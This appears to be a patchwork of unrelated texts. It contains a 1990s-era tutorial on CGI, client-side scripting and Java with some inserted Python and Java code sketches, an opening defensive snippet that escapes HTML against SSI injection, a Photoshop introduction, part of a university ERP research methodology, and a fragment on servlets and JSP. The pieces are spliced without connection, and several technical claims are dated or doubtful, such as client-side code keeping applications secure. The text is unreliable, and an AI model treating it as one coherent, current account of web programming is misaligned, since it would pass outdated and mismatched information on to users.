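Filtering echoed user text can be sketched in a few lines. Note that this sketch swaps in a broader technique than the substitution described above: instead of rewriting only the opening of an SSI command, it escapes every HTML metacharacter, so that nothing the visitor typed can be read as markup. The function name is an assumption made for illustration.

```python
import html


def neutralize_user_text(text: str) -> str:
    """Escape user input so it is displayed literally, never interpreted.

    Hypothetical helper for a guestbook-style script that echoes input.
    """
    # html.escape turns <, >, & and quotes into character entities, so an
    # SSI directive such as <!--#exec ...--> no longer starts with "<!--".
    return html.escape(text, quote=True)
```

A guestbook entry containing an SSI directive is then printed on the page as harmless text.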
Introduction to Web Programming:
Tutorials
Web Programming 101

At some point along the way webmasters around the net realized that HTML (1) was too limited to do many of the things that they wanted to accomplish. How could a webmaster display the current time and date on every page accessed by a client? How could she collect information about clients who were accessing her web site? How could she create a web site that was more than just an information warehouse, but a meaningful and dynamic conversation? Certainly, HTML was great for distributing "pre-prepared" web pages on request. A client would use a web browser to contact a web server and use HTTP to ask the web server for a specific HTML document. (2) The web server would then send the requested document back to the web browser which, in turn, would display the document as defined by the HTML to the client.
Pretty nifty really, and far superior to older technologies like gopher and ftp. However, the interaction between the client and the server was still extremely trivial. The server could only provide HTML documents that had been specially encoded by a webmaster, and that had been placed in certain publicly-accessible directories. The interaction between web browser and web server was pretty mind-numbingly simplistic and the coolness of surfing through hyperlinks quickly became stale. HTML fell short for anything truly "dynamic". For example, to put the current date on every page using only HTML would require a webmaster to manually edit every file, every day. As you can imagine, this got tiring very quickly for sites with more than 5 pages. Webmasters needed a way to have HTML pages created and modified "on-the-fly," with information that could change weekly, daily, by the second, or for each and every request. And they needed those pages to be modified automatically, without their constant oversight.
As it so happens, the hardware that web server software runs on typically has quite a few resources that can be utilized to help solve these problems. Not only do servers have processing power to spare, they also have a battery of applications (such as e-mail, database manipulation, or calendaring) already installed and ripe for utilization. And thus was born CGI (Common Gateway Interface). (3)

CGI: The Birth of Server Side Web Programming

As with most computer jargon, the term Common Gateway Interface can be fairly meaningless at first glance. So, before getting into what CGI can do, let's take a moment to define what CGI actually is.
Common - CGI programs can be written with many languages. CGI can be programmed in C, C++, Java, Perl, Visual Basic, or any other language that can accept user input, process that input, and respond with output. Further, CGI works with many different types of systems. CGI works on Mac, NT, Windows, OS2, Amiga, UNIX, and pretty much every operating system that runs web server software. By the way, if you use a "platform independent" language like Perl or Java to write your CGI script, the exact same CGI script can be moved directly from one platform to another without it breaking! (4)
Gateway - CGI's usefulness does not stem from what it can accomplish by itself, but what it can accomplish by making partnerships with other resources. I often see CGI as a middleman or a translator whose job it is to help more powerful resources like databases, graphics generation programs, or network applications talk to each other and work towards a common solution. CGI is the gateway between the lone web surfer with her trusty web browser and the vast web of computers (each with their own specific language and protocols) and computer programs (each with their own interfaces and methods of output). CGI translates between the language the client speaks (perhaps HTMLized English) and the multitude of languages spoken by the resources the client wants to utilize (such as SQL for relational databases). This is a crucial job, cause let me tell ya, my grandmother does not want to know how to speak SQL when she is browsing the web!
Interface - CGI is not a language. Neither is it a program. CGI is a standard of communication, a process, an interface that provides well-defined rules for creating partnerships. The benefit is that if everyone follows the rules of the interface, then everyone can talk to each other. Thus, typically we say that we write "CGI programs" or "CGI scripts" that perform the functions of the common gateway interface.
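To make the "interface" idea concrete: under CGI the web server hands the request to the program through environment variables (such as QUERY_STRING) and standard input, and the program answers on standard output with a header, a blank line, and then the document. The following is a minimal sketch written in Python purely for illustration; the "name" parameter and the function name are assumptions. It also solves the earlier problem of putting the current date on a page without editing it by hand.

```python
import html
import os
import sys
from datetime import datetime
from urllib.parse import parse_qs


def build_response(environ, now):
    """Build a complete CGI response (header, blank line, HTML body)."""
    # The server places everything after "?" in the URL in QUERY_STRING.
    query = parse_qs(environ.get("QUERY_STRING", ""))
    name = query.get("name", ["stranger"])[0]  # "name" is a made-up field
    body = (
        "<html><body>"
        f"<p>Hello, {html.escape(name)}.</p>"
        f"<p>The server time is {now:%Y-%m-%d %H:%M:%S}.</p>"
        "</body></html>"
    )
    # The header block ends with an empty line; the document follows it.
    return "Content-Type: text/html\r\n\r\n" + body


if __name__ == "__main__":
    sys.stdout.write(build_response(os.environ, datetime.now()))
```

Any language that can read environment variables and write to standard output can follow the same rules, which is exactly what makes the interface "common".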
Let's look at the CGI processes in the following chart.
Okay, so that is probably a lot of abstract stuff to take in all at once, especially if you have not worked with CGI already. So let's back up a minute and go over what CGI is by looking at it in the wild. Let's look at some examples of CGI in action.

Processing Forms - One common use for CGI is providing a way for web surfers to enter data into HTML forms and send that data to some site administrator. Take a look at this Feedback Form Demo. Try it out! With a feedback form, the web surfer can not only read pre-prepared HTML documents, but can actually send feedback in response. Forget about doing that with HTML alone. This form processing script actually takes the data input by the web surfer and sends it as e-mail to the form administrator. Another common form processing application is the Guestbook that allows web surfers to leave publicly readable greetings. The CGI manages a common file on the web server that everyone can read and write to.

Discussing Things - More than simply allowing clients to "talk back", CGI helps in creating an ongoing dialog between multiple clients. Check out this Bulletin Board System that actually lets many people collectively create an archive of related messages. And when you're done with that, check out how CGI implements Realtime Chat that allows people to chat anywhere in the world in real time (as if it were a telephone call but typed).

Shopping - CGI has also been very useful in selling products on the web. Take a look at this Demonstration Web Store.

Databases - Finally, CGI can be used to manage databases. Here is an example of a Database Management System for CGI. And here is a similar application used to perform Groupware Calendaring.
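The feedback form case can be sketched briefly. The code below is an illustration in Python, not the demo script itself: it decodes a submitted form body and prepares an e-mail message for the administrator without sending it. The field names "email" and "comments" and the addresses are hypothetical.

```python
from email.message import EmailMessage
from urllib.parse import parse_qs


def feedback_to_email(form_body: str, admin_address: str) -> EmailMessage:
    """Turn an URL-encoded form submission into an e-mail message."""
    fields = parse_qs(form_body)
    sender = fields.get("email", ["(not given)"])[0]
    comments = fields.get("comments", [""])[0]

    message = EmailMessage()
    message["To"] = admin_address
    # Headers are fixed values; visitor input goes only into the body,
    # so tainted data cannot add or alter mail headers.
    message["From"] = "webform@example.invalid"
    message["Subject"] = "Feedback form submission"
    message.set_content(f"Visitor address: {sender}\n\n{comments}")
    return message
```

Handing the finished message to a mail server is a separate step and is left out here.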
You can easily see that CGI makes for a much more profound surfing experience, allowing web sites to offer useful and compelling services to surfers who may be interested in information or products offered. (5) However, there is a dark side!

CGI sucks!

Well, as you might expect, for all its dynamism, CGI was not a holy grail. In fact, there are a lot of sysadmins out there who would be ecstatic if CGI were outlawed. CGI simply causes too many problems.

CGI introduces security holes. Lincoln Stein writes the following eloquent warning on the problem:

Unfortunately, there's a lot to worry about [when running a web server with CGI]. The moment you install a Web server at your site, you've opened a window into your local network that the entire Internet can peer through. Most visitors are content to window shop, but a few will try to peek at things you don't intend for public consumption. Others, not content with looking without touching, will attempt to force the window open and crawl in.

It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes. Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole.

It is one thing to allow any freako on the Internet access to your web server, when the communication is controlled through the boundaries defined by HTTP and implemented by web browsers. It is another thing to allow a stranger access to an unlimited number of applications housed on the same server through a renegade CGI script.
In the WWW Security FAQ, Stein identifies four overlapping types of risk:

o Private or confidential documents stored in the Web site's document tree may fall into the hands of unauthorized individuals.
o Private or confidential information sent by the remote user to the server (such as credit card information) might be intercepted.
o Information about the Web server's host machine might leak through, giving outsiders access to data that can potentially allow them to break into the host.
o Bugs can allow outsiders to execute commands on the server's host machine, allowing them to modify and/or damage the system. This includes "denial of service" attacks, in which the attackers pummel the machine with so many requests that it is rendered effectively useless.

I recommend checking out the following CGI Security sites if you are interested in getting more detailed information.

o Writing safe CGI scripts -- an overview (Paul Phillips)
o NCSA's tips for writing secure CGI scripts
o Latro, a tool for identifying insecure Perl CGI installations, by Tom Christiansen
o Are You Safe? (Keith Gardner)
CGI is at the mercy of HTTP. It is important to note that HTTP only provides for a one-time, question/answer type of communication. After all, it was defined primarily for web browsers and web servers to exchange HTML documents. Thus, by definition, HTTP is not very dynamic.

One-time, question/answer communication works like this: the web browser and the web server are only connected as long as it takes for the web browser to send one document request and the web server to send one requested document. If the browser wants a second document, it must recontact the server and ask again. Each request is new. The server maintains no ongoing connection or record of past exchanges. While this is very efficient for network traffic (because the bandwidth is only used when information needs to be exchanged), it is a big pain in the butt when it comes to CGI, because CGI is about conversations, not about one-time question/answers.

Imagine that when talking on the phone you had to hang up and redial every time you said something and received an answer. Imagine further that every time you called back you had to go over every previous exchange before you could get to the next piece. That is the way web browsers work with web servers.

This makes communication tough for three reasons. First, if the client and server are to maintain information over several exchanges, the CGI must be responsible for keeping a running record of the conversation so that every time there is a new exchange, the web server can consult the record of the entire conversation up to that point. This is what CGI aficionados call "maintaining state". The CGI script must be able to keep track of certain information like username or the contents of a virtual shopping cart for every "instance" of a script. (6) That is, there must be a way to tie the current HTTP request to related ones that have gone on before.
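Tying one request to the ones before it can be sketched in a few lines. The following is a minimal illustration in Python, assuming a hypothetical hidden form field named session_id and a state directory that lives outside the cgi-bin tree; it is one possible approach, not a description of any particular script.

```python
import json
import os
import re
import secrets

# A session id is tainted input like any other: accept only the exact
# shape this script itself generates (32 lowercase hex characters).
SESSION_ID_PATTERN = re.compile(r"[0-9a-f]{32}")


def handle_request(state_dir, form):
    """Load the visitor's cart, apply this request, and save it again."""
    session_id = form.get("session_id", "")
    if not SESSION_ID_PATTERN.fullmatch(session_id):
        session_id = secrets.token_hex(16)  # first visit, or a forged id

    path = os.path.join(state_dir, session_id + ".json")
    state = {"cart": []}
    if os.path.exists(path):
        with open(path, encoding="utf-8") as handle:
            state = json.load(handle)

    if "add_item" in form:  # "add_item" is a made-up field name
        state["cart"].append(form["add_item"])

    with open(path, "w", encoding="utf-8") as handle:
        json.dump(state, handle)

    # The id travels back to the browser inside the next form, so the
    # following request can be matched with this one.
    hidden_field = f'<input type="hidden" name="session_id" value="{session_id}">'
    return session_id, state["cart"], hidden_field
```

Every request repeats the whole load, modify, and save cycle, which is the bookkeeping burden the running record implies.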
Maintaining state is possible with CGI using hidden variables, by encoding the URL, or by maintaining a state file on the server. It's just not easy or efficient. (7)

Second, every set of question/answers causes the web server to execute a unique instance of the CGI script. This is pretty expensive, especially on a high volume web site that may have 100 instances of a CGI script executing at any given moment, each, perhaps, with its own Perl interpreter. (8) Every one of those CGI scripts takes a little bit of oomph out of the server engine. If we were not limited to question/answer format, we would not need to execute so many instances. Consider the following CGI application executing....
Client: Hello?
Server: Welcome, what would you like? (CGI script executed once)
Client: I would like a list of products you are selling.
Server: Here is a list. (another one)
Client: I want to purchase this product.
Server: Okay. (yep)
Client: I'm done, can I check out?
Server: Yes, what is your credit card number? (another script)
Client: Here it is.
Server: Thanks. (another instance of the script that also emails results to some store admin) (9)
Yuck, this exchange caused 5 instances of the store script to be executed as well as 5 Perl interpreters if the CGI script was written in Perl.

Third, CGI is extremely slow. Every time the client does something, the CGI script must recreate the entire dialog and execute a new request. Add a new item to a virtual shopping cart - new request. Calculate a running total - new request. Submit an order - yet another request. Each request takes time, since the CGI script must be executed again and everyone must wait for a busy Internet.

CGI is ugly. Finally, CGI scripts produce fairly ugly user interfaces. Basically, CGI is limited to bland HTML-based forms and whatever bells and whistles can be provided by surrounding HTML layout. Thus, no CGI application looks like your swank bootleg copy of Word. This may not seem like a big issue at first, but when you start competing for web hits with multi-million dollar companies, image is indeed everything. CGI simply cannot compare with web based applications that are not limited to HTML.

Well, those are some pretty damning flaws. Like I said, many systems administrators would love to see CGI fall off the face of the Earth. Unfortunately for those system administrators, the fact is that CGI has continued to be the workhorse of the web, powering 90% of the dynamic web pages out there. The fact is that CGI, especially CGI/Perl, is easy to work with and most non-technically oriented webmasters out there can get their needs filled, and filled right away. However amazingly, brandfantasmagorically wonderful other technologies sound, they are still vaporware as far as the average web developer is concerned. Either the ISP does not provide those technologies, or the learning and development curve is too steep or expensive. And of course for small applications typical of most websites, the big guns of C or C++ are just overkill. CGI, for all its flaws, works, and works pretty darn well if done carefully.
"Intranet" developers with massive budgets can yack all they want to about servlets and SQL gateways and Server Side Includes and customized server applications written in Java, but for most "Internet" developers out there, CGI is the only tool available for solving their problems. And with creativity and care, CGI can also be the right tool.

Client Side Scripting

However, this is not to say that other technologies are not extremely useful. Several technologies have proven to be just as important as CGI for the average Internet developer. These technologies focus on putting the demands of computation in the hands of the client instead of the server. Thus, things like processing simple requests, maintaining state, and GUI (Graphical User Interface) presentation are handled by the web surfer's own computer instead of being handled by some web server hosting a site.

Client-side programming is based on the idea that the computer that the client is using to browse the web has quite a bit of CPU power sitting there doing nothing. Meanwhile, web servers are being tasked to death handling hundreds of CGI requests above and beyond their regular duties. Thus, it makes sense to share some of that burden between the client and server by taking some of the processing load off the server and giving it to the client.

As it so happens, much of what CGI does can be handled on the client's side. Typically, the only time the server needs to be involved is when the web application needs to send email or access datafiles. Things like maintaining state, filling out forms, error checking, or performing numeric calculation, on the other hand, can be handled by the client's own computer. The web browser need not check back with a CGI script every time the user wants to do something. A "script-enabled" HTML page can carry with it instructions on how to handle certain events. In the following figure, client-side scripting has reduced server load by over 80% for every client accessing the CGI script. And of course, since most of the processing is handled locally, the application as a whole runs 5 times faster.
Obviously, this solves many of the problems posed by CGI. Client-side applications maintain security by keeping server processing to a minimum. They are not restricted by HTTP and the GUI can be as pretty and sleek as any traditional software package out there.
The two most popular languages for client-side scripting are JavaScript (Netscape Navigator) and VBScript (Microsoft's Internet Explorer). Both technologies allow web programmers to encode short program "snippets" into their HTML documents that can be executed by a web browser. JavaScript Made Easy [link has gone dead--ed.] provides several excellent examples of JavaScript in action and Reaz Hoque provides a very straightforward tutorial on JavaScript basics. On the other side of the coin, Microsoft provides a good list of samples for VBScript.

Actually, script-enabled HTML pages can be fairly dynamic and do indeed cut down on the work of the server. Of course, in any real application, there will need to be a CGI script on the server to email results or access data, but much of the work, perhaps 75% of it, is done by the client. This can cut down server load by 80% on complex applications.

Unfortunately, script-enabled HTML pages have their problems too. The most obvious problem, of course, is that the web browser program must be able to interpret the language used for scripting. And since Netscape and Microsoft are too knuckleheaded to build upon common standards, we are left in the cold. JavaScript programs continually break when viewed using Internet Explorer and VBScripts do the same when viewed with Netscape. Thus, client-side scripting has remained primarily useful only for limited, controlled intranets where webmasters can be sure that all users are using the same browser software to view web pages.

Further, both JavaScript and VBScript are limited languages meant for quick jobs with little complexity. Ticker tape animations and subtotaling are one thing, but a true web application requires a bit more oomph.

Platform Independent Client-Side Applications with Java

That very oomph comes with Java.
Java was originally developed at Sun Microsystems in 1991 to provide a platform-independent programming language and operating system for consumer electronics (TV sets, toasters and VCRs). In syntax and execution, Java is a lot like a simplified version of C++. ("Simplified" should be read in the previous sentence as "improved".) It is a highly robust, distributed, high performance, object-oriented, multi-threaded language with all of the usual features. As such, it builds upon years of C++ development, taking the good and dispensing with the bad.

As it so happened, however, Java did not make it into the consumer electronics market. Instead it wound up in our web browsers. Java seemed to be a perfect fit for the web. The language itself was extremely small (as it was built to go inside toasters and alarm clocks with tiny amounts of memory). Thus it could quickly be transferred over the web.

Further, Java was platform independent. That is, any computer with a Java virtual machine can run a Java program. Programs can be written anywhere and be run anywhere. This is crucial because, as we saw in the case of the client-side scripting languages, if a language cannot run on any machine, it cannot be used on the web, which must service every machine, language, and environment imaginable.

Platform independence works because Java programs are interpreted by a virtual machine rather than compiled for one particular processor. Unlike C or C++ code, when Java is compiled, it is not compiled into platform specific machine code, but into platform independent byte code. This byte code is distributed over the web and interpreted by a virtual machine (typically built right into a web browser these days) on whichever platform it is being run. Perhaps a picture would be useful...
Thus, as a programmer, you need only concern yourself with the generic Java programming language and compile your applications into bytecode on whatever system you are using. You can then be assured that your bytecode will be executed correctly whether your clients are using Macs, PCs, Unix boxes or anything else.

Java, of course, demands books' worth of explanation and description. So, of course, we will not delve too deeply into the language here. Instead, I recommend that you browse through the resources collected at Gamelan, which is the be-all and end-all of Java resource sites. There you can sample several Java programs yourself and see how amazing Java really is.

Did I say amazing? Well, Java is certainly a great addition to every web developer's toolbox, but as you might have expected, Java has as many drawbacks as any of the other tools we've discussed already.
Java Sucks

Though Java can create interfaces that go way beyond the capability of HTML, CGI, and JavaScript, and though the language is extremely powerful and portable, Java still has serious restrictions.

Of particular concern are the security restrictions built into Java, such as the fact that Java programs (Java applets specifically) cannot easily write files to the local hard drive or get data from servers other than the ones they came from. While this may make the public more confident about the language (an important thing and perhaps worth the limitations it causes), it makes Java programs fairly useless for the average developer who absolutely needs such capabilities to create full featured applications.

Further, Java programs with a lot of logic take longer to download. If you went to the Gamelan site linked above and tried to run some example Java apps, you certainly found that you had to wait quite a bit for them to download.

Similarly, because the programs run on the client's machine, they do not have access to resources on the server. Thus, a Java program cannot even query simple flat-file databases located remotely without a proxy (some other program working as a helper on the server).

Finally, Java is still a new language. As such, it is plagued by all the bugs, inconsistencies and incompatibilities that any new language is faced with. Though Java boasts platform independence, in reality, programs run differently from platform to platform...if they work at all. Further, though programs might be platform independent, they are not browser independent. Each browser, in fact each operating system, has its own buggy virtual machine that produces different output for the same program. Thus, when you distribute a Java program, you can never be sure exactly how it will run, or if it will run at all.

Though the restrictions of Java are being addressed slowly, the picture looks bleak in the short term (next couple of years) for the Internet developer.
Although code signatures and other security fixes are arriving, they will still cause complications for the average web developer with regard to centrally storing information and trusting it. Security will be a continuing thorn in our sides.

But even still, if all of the well-publicized inconveniences of Java were solved tomorrow, there would still be issues preventing the average web developer from writing all their web apps with Java. For example, not everyone has a database to program against or can afford the cost of JDBC (Java database connectivity) proxy servers. In fact, it is safe to say that "most" web developers do not have those tools to work with. Typically, Internet Service Providers do not allow customers to run servers of any kind through their account, let alone complicated database servers. Thus, in order to perform database management functions essential to many applications, the average web developer will still need to work with flat files on the server hardware...and this means CGI.

There are also issues preventing the spoiled "intranet" developer from using Java. For example, the JDBC standard will not necessarily help in a corporate environment in which some sort of proxy to a real database server may still be needed that can communicate across a firewall with a web server. Not only will Java be blocked by a firewall, but it cannot use standard encryption methods to provide secure, encrypted transactions.

In short, though Java is a profound addition to our toolbox, it is not the answer to all our woes.

Conclusion: Stocking your Toolbox

As any good technician knows, there is no such thing as a "best" tool. The best tool is dependent on a whole host of factors from the type of task at hand to the personality of the marketing director. The best tool is a fantasy. Instead, every web developer should have at her disposal a wide array of tools to solve problems.
Sometimes a server-side solution will be appropriate, other times a client-side solution will be best.
Your main goal as a web developer is to develop an intuition about when to use which. That said, I would like to suggest one combination of tools that I see as becoming extremely important for all web developers. The combination is that of CGI and Java. Consider the following Problems and Solutions...

Problem: The average "Internet" web developer has probably already picked up Perl/CGI programming. Most have not picked up Java with the exception of being able to code GUI interfaces using various visual tools such as Symantec's Visual Cafe or Microsoft J++.

Solution: A Java to CGI interface leverages existing Perl/CGI knowledge so that the core program logic can be located on a server while merely having to code a thin (very small and easily downloaded) GUI Java client. In addition, a developer experienced in Perl will be able to whip out 80% of their program in a short period of time using a language like Perl while leaving a mere 20% (the GUI) to Java (a hard language for most people).

Problem: Internet developers who do work for sites on a virtual web server or an ISP typically cannot use Sybase, Oracle, or another commercial database to store data via JDBC. Frequently, the ONLY option that these developers or consultants have is to do flat-file processing using CGI/Perl, which generally has precluded the use of Java.

Solution: A Java to CGI interface will allow applets to be created that can use flat-file databases that an average small business can afford (free).

Problem: Developers who have already invested a lot of time creating CGI/Perl for their site do not want to rewrite all their applications in Java.

Solution: A Java to CGI interface will allow existing applications to be leveraged by allowing a developer to create a Java applet on top of an existing CGI script with minor modifications to make the CGI output data conducive to interpretation by the Java applet.

As you can see, the benefits and flaws of Java and CGI complement each other very well.
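The "minor modifications" in the last solution amount to having the CGI script emit plain, machine-readable records instead of HTML, and having the client parse them. The sketch below illustrates that exchange in Python for both sides; in the arrangement described above the client half would be written in Java. The pipe-delimited format, the function names, and the sample records are all assumptions made for illustration.

```python
import csv
import io


def records_to_cgi_output(records):
    """Server side: emit flat-file records as delimited plain text."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, delimiter="|", lineterminator="\n")
    writer.writerows(records)
    # text/plain tells the client this is data, not a page to display.
    return "Content-Type: text/plain\r\n\r\n" + buffer.getvalue()


def parse_cgi_output(response):
    """Client side: split off the header block and rebuild the records."""
    _headers, _separator, body = response.partition("\r\n\r\n")
    return list(csv.reader(io.StringIO(body), delimiter="|"))
```

Because the script only changes what it prints, the existing flat-file logic on the server can stay as it is.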
Using Java front ends and CGI back ends presents an excellent opportunity for web developers on the Internet to create fully featured applications with the available resources. I would recommend that every web developer study the interaction of Java and CGI to be prepared for the contracts that will come forward over the next few years.

Footnotes

The Web Developer's Resource Library has an excellent HTML Primer if you need a refresher on what HTML is. Basically, HTML (Hyper Text Markup Language) is a way of describing how a web browser should display text and images. HTML codifies page layout into a series of instructions called "HTML tags". The job of web browser programs is to translate ugly HTML instructions into the beautiful web pages we see while surfing.

Okay, so there are quite a few jargon words in that sentence which might need quick explanations. In this column we will use the word "client" to refer to a person who is using a "web browser" program like Netscape Navigator or Internet Explorer to display HTML documents received from a "web server". A web server is a combination of hardware (an actual computer that stores all of the HTML files) and software (the program that listens for web browser requests and utilizes the hardware resources to fulfill those requests). Web browsers and web servers communicate using HTTP (Hyper Text Transfer Protocol), which provides a communication standard for efficient and intelligible dialog. Essentially, HTTP allows a web browser to contact a web server somewhere on the web and ask for a specific document (or resource). It also allows the server to send the requested document (or the output of the executed resource) back to the web browser.

Truthfully, much of what is done by CGI can also be done using SSI (Server Side Includes), a service provided by web server software in which certain HTML comment tags can be used to execute commands. SSI will not be covered this month since it demands its own article. For the purposes of this introduction, however, SSI programs are similar enough in theory to CGI programs that they can be thought of as the same thing.

When you get some software for your computer and you have to get the special "Mac Version" or "Windows Version", you are getting a "platform dependent" program. Unfortunately, when you move from being a PC user to being a Mac user, you have to buy all new programs because the programs you bought for Windows will not work on a Mac. The beauty of web programs is that they are typically "platform independent", which means that you can run them anywhere. Whether you use a PC, Mac, or Unix box, the programs will work just fine.

CGI is not the only form of server-side scripting available, of course. For example, Netscape's LiveWire is an online development environment for web site management and client-server application development. It uses JavaScript, Netscape's scripting language, to create server-based applications similar to CGI programs. Unlike CGI programs, however, LiveWire applications are closely integrated with the HTML pages that control them. Non-CGI server-side strategies are best covered in their own article.

You can think of an instance of a script as a unique and independent version of a generic script. It is called an "instance" because ten web surfers could all execute a CGI script at the same time.
Though each web surfer would be using the same generic CGI script, each instance of that script would be personalized to that web surfer. Thus you may have ten instances of the exact same script running in parallel on the web server hardware.

Hidden variables allow you to maintain state using the HTML "Hidden" form tag. Essentially, you include information in your HTML form that will not be visible to the user when they look at the form in their web browser window, but which will be transferred to the CGI script with the user-supplied data. The format of the tag looks something like the following:
<INPUT TYPE = "HIDDEN" NAME = "first_name" VALUE = "selena">
<INPUT TYPE = "HIDDEN" NAME = "last_name" VALUE = "sol">
When the CGI script processes the information that the user enters into the HTML form, it will also receive the variable "first_name" with the value "selena" as well as "last_name" with the value "sol".

If the user is not using a FORM tag to navigate through a site, the admin can still encode state information in the URL by using the HTTP standard for URL encoding. For example, the following hyperlink would send the same info as above to the CGI script:
<A HREF = "http://www.extropia.com/test.cgi?first_name=selena&last_name=sol">click here</A>
Notice that the variables to be passed along are listed after the question mark, name/value pairs are separated by the ampersand sign, and each variable name is separated from its value by an equal sign.

Finally, the CGI script may write out state information to a file on the server and then simply pass along the location of the file using one or both of the above methods. This is best when there is a large amount of state information.

By the way, maintaining state can also be achieved using Netscape Cookies; however, we will not address cookies here because they require their own article.

Perl is a fun language to use because it keeps the nuts and bolts of machine code as invisible as possible. One of the ways Perl does this is by adding an extra step between you and the computer. This extra step is called a "Perl interpreter". The interpreter (which your sysadmin must install) reads a Perl program that you write and translates it "on the fly" into machine code that can be understood by your computer. Your "executable" can then be moved to any other system with a Perl interpreter and be run without problems. Further, the code can be easily modified and understood. Unfortunately, in order to run your executable, you must also run the interpreter, and this can be expensive in terms of server resources.

In more intense languages like C or C++, there is no interpreter. You must use a special "compiler" program to translate your code into machine code. This affords greater power to your programs since you do not need to run a separate interpreter when you run your executable, but it does mean that executables are specific to each operating system and that the source code is stored separately from the executable code.
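The name/value encoding described in the footnote on maintaining state (pairs joined by ampersands, names and values separated by an equal sign) can be sketched in Java as follows. This is an illustrative sketch only: the class and method names are hypothetical, it ignores repeated parameter names, and it assumes Java 10 or later for the URLEncoder and URLDecoder overloads that take a Charset.

```java
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;

/** Sketch of carrying state as URL-encoded name/value pairs (hypothetical names). */
final class StateEncodingSketch {

    /** Encodes the state as name=value pairs joined by '&'. */
    static String toQueryString(Map<String, String> state) {
        StringBuilder sb = new StringBuilder();
        for (Map.Entry<String, String> e : state.entrySet()) {
            if (sb.length() > 0) {
                sb.append('&');
            }
            sb.append(URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8))
              .append('=')
              .append(URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8));
        }
        return sb.toString();
    }

    /** Decodes a query string back into a map, preserving the order of the pairs. */
    static Map<String, String> fromQueryString(String query) {
        Map<String, String> state = new LinkedHashMap<>();
        if (query.isEmpty()) {
            return state;
        }
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            // A pair without '=' is treated as a name with an empty value.
            String name = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            state.put(URLDecoder.decode(name, StandardCharsets.UTF_8),
                      URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return state;
    }

    public static void main(String[] args) {
        Map<String, String> state = new LinkedHashMap<>();
        state.put("first_name", "selena");
        state.put("last_name", "sol");
        String query = toQueryString(state);
        System.out.println("test.cgi?" + query);
        System.out.println(fromQueryString(query));
    }
}
```

Encoding every name and value matters as soon as the state contains a space, an ampersand, or an equal sign, since those characters would otherwise be mistaken for separators.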
Notice that CGI scripts must be smart enough to answer all sorts of questions.
About Photoshop:
Introduction to Adobe Photoshop

What is Photoshop
Adobe Photoshop is, hands down, the most popular program for creating and modifying images for the web. This is true not only because Photoshop is available on a wide array of platforms ranging from Mac to Windows to UNIX, but because after four generations of development, Adobe Photoshop has the most intuitive user interface, the most complete set of tools, and the largest number of reference books around. In fact, as Deke McClelland says in Photoshop 3 Bible, "Some estimates say that Photoshop sales exceed those of all of its competitors combined."
Photoshop is only one tool in a good designer's arsenal. Other popular tools include Paint Shop Pro, DeBabelizer, and LView Pro for Windows, and GIF Converter and Graphics Converter for Macintosh. Fractal Design, Aldus and HSC also put out some excellent programs.
Kenji Tachibana (a gifted freelance graphics artist) and I decided to focus on Photoshop primarily because Photoshop is the program that most web designers use. However, since most programs these days use similar concepts, many of the things we talk about here will be directly relevant to any other graphics program on the market.
Photoshop Requirements
One thing to keep in mind about using Photoshop, however, is that since Photoshop is so powerful, it requires a fairly souped-up working environment. Specifically, it would be a good idea to have at least 32MB of RAM. After all, as a web designer, you will be tasking your system while developing. Often you will have two browsers, Photoshop, an HTML editor, a word processor, and two or three ftp/telnet sessions open all at one time. Without enough resources, your computer will not have enough gusto to keep up with you.
Another downside to Photoshop is that it can be rather expensive to get the latest and greatest version. However, this tutorial is written with this in mind. We have limited our discussion mainly to 3.0 basics (which still apply for 4.0 users). These basics represent the foundation of your skills with Photoshop regardless of the version. Thus, after reading through this tutorial, you will have what you need to make stunning web graphics by investing in a year-old version of Photoshop at a quarter of the price. Eventually, of course, you will want to upgrade.
Literature Review
Articles (online, white paper, journals)
Because the project concerns ERP in universities and few books cover the subject, a substantial amount of reading was done in online articles, journals, and white papers related to the project, and the contents of each were analyzed. Since this is initial research into ERP and its clients, it was also useful to see whether the major players were using the same package for their businesses. The analysis shows that most case studies concern universities in the USA, with only one or two from Asia and Europe. The project has therefore started from the American approach and applied it to the European model of education. The case studies present two opposing views: some authors say that ERP works for universities, while others say that it does not.
Weighing these two views led to the conclusion that ERP is implemented only by universities that have spare liquid assets.
Personal Observation
A personal observation was carried out at Sheffield Hallam University. The university uses two different systems for its admissions and finance departments. Both departments need access to a real-time system that shows the progress of an application from both the finance and the admissions points of view, instead of asking the student to contact each department for the same work.
Questionnaire
Universities will be contacted by email, and a questionnaire will be sent to each of them to gather responses.
Direct Contact
The Learning and IT Services department at Sheffield Hallam University provided valuable information about the enterprise systems being implemented and used at the university. This information helps the research distinguish between the functions and the decisions carried out.
3.4 Limitations in Research
The project work did have its roadblocks, which mainly related to the field in which the technology was being considered. Although the technology has been in existence for quite a while, as already stated, it was still being adapted for the universities of the 21st century.
Books were available in adequate numbers but were limited in scope: they emphasized technical aspects and gave little information on where the technology can be applied. The books referred to are listed in the bibliography section of this project work. When the project work started, quite a few articles were available. Some articles relating to fields other than universities were studied to understand how the technology has fared there and whether they could be useful for this work. A little of that information was useful, with the majority of the articles stating the benefits and expected financial outcomes for the companies concerned.
The case studies considered for the analysis were mainly centered on the American model of education and were tailor-made for the American education system. Relatively few case studies of British universities existed at the start of the project.
When direct contact was established at Sheffield Hallam University, valuable information was obtained about the kinds of enterprise systems the university might employ to carry out its functions. The relevant departments of the university that have already implemented ERP technology were contacted by email, but no response was received. This may be due to the timing of the emails or to the present preoccupations of the university.
The Problem with Straight-up Servlets
In the beginning, servlets were invented, and the world saw that they were good. Dynamic web pages based on servlets executed quickly, could be moved between servers easily, and integrated well with back-end data sources. Servlets became widely accepted as a premier platform for server-side web development. However, the commonly used simple approach to generating HTML content, having the programmer write an out.println() call per HTML line, became a serious problem for real servlet use. HTML content had to be created within code, an onerous and time-consuming task for long HTML pages. In addition, content creators had to ask developers to make all content changes. People searched for a better way.
Along Comes JSP
